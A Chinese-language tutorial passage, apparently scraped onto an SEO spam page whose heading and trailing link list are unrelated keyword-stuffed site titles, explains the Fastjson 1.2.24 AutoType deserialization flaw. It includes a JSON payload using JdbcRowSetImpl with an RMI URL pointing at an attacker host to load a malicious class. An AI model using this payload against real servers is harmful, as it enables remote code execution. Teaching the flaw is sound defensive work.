当前位置: 首页 > news >正文

福州自适应网站建设百度网站检测

福州自适应网站建设,百度网站检测,中装建设股价,网站开发易语言fastjson漏洞 fastjson工作原理攻击原理补充 例子 fastjson工作原理 fastjson的作用是将JAVA对象转换成对应的json表示形式,也可以反过来将json转化为对应的Java对象。fastjson使用AutoType功能进行反序列化,AutoType使用type标记字符的原始类型&#x…

fastjson漏洞

  • fastjson工作原理
  • 攻击原理
    • 补充
  • 例子

fastjson工作原理

fastjson的作用是将JAVA对象转换成对应的json表示形式,也可以反过来将json转化为对应的Java对象。fastjson使用AutoType功能进行反序列化,AutoType使用==@type==标记字符的原始类型,在反序列话时会读取@type以此把内容反序列化到对象,在上述过程中会调用到库中的setter和getter方法

攻击原理

攻击者传入一个恶意构造的json内容,程序对其反序列话后得到恶意类并执行了恶意类中的恶意函数,进而促使恶意代码执行
合理构造一个JSON使用@type指定一个想要攻击的类库就可以实现攻击

补充

仅影响Fastjson1.2.24及之前版本

例子


{"b": {"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName": "rmi://攻击者的IP地址/恶意类","autoCommit": true}
  • JSON 数据包:这里展示的 JSON 数据包包含一个名为 b 的对象,其中有一个 @type 字段,指定了这个对象的类型为
    com.sun.rowset.JdbcRowSetImpl。这是一种 Java 对象类型。
  • 恶意数据:在 dataSourceName 字段中,提供了一个远程方法调用 (RMI) 的 URL,指向攻击者的 IP
    地址和他们控制的恶意类。这意味着 Fastjson 会尝试从这个远程地址加载并执行恶意类。
  • 自动提交:autoCommit 字段被设置为 true,表明在反序列化后自动执行某些操作。
http://www.yidumall.com/news/19411.html

相关文章:

  • 深圳燃气公司热线95158微信小程序排名关键词优化
  • 安阳网站公司哪家好对百度竞价排名的看法
  • 做情趣导航网站可以吗站长工具天美传媒
  • 现在可以用的网站深圳在线制作网站
  • seo在线优化简阳seo排名优化培训
  • 网页设计与网站建设中的热点按效果付费的网络推广方式
  • 网站建设百度推广开户怎么自己注册网站
  • 小程序制作pdf单页网站怎么优化
  • 做网站费用列入什么科目国内免费域名
  • 简单的公司资料网站怎么做百度客服人工电话24
  • n怎样建立自己的网站推广app平台有哪些
  • 做外国网站自媒体西安网站优化
  • 网站设计制作服务热线贵阳网站建设
  • 网站建设培训教程新手入门到精通抖音怎么推广引流
  • 网站代理做反向深圳全网推广服务
  • 网上有做任务赚钱的网站seo关键词排名优化专业公司
  • 做设计开店的网站免费网页制作平台
  • wordpress按照浏览量排序关键词优化报价
  • 做ps的赚钱的网站有哪些爱站在线关键词挖掘
  • 网站建立的关键技术发布软文的平台有哪些
  • 网站公司深圳百度推广投诉中心
  • 高平网站优化公司百度收录推广
  • 用html做网站的背景图怎么弄网页制作app
  • wordpress 主题全屏seo优化公司哪家好
  • 做联盟 网站 跳转 防止垃圾外链深圳seo公司排名
  • 做微信公众号微网站吗辅导机构
  • 秦皇岛网站建设哪家好百度公司在哪里
  • 做网站生意推广引流app
  • 安康做网站的公司电话网站搜索引擎优化方案
  • 上海做网站公司做网站的公司有哪些简述网站建设的一般流程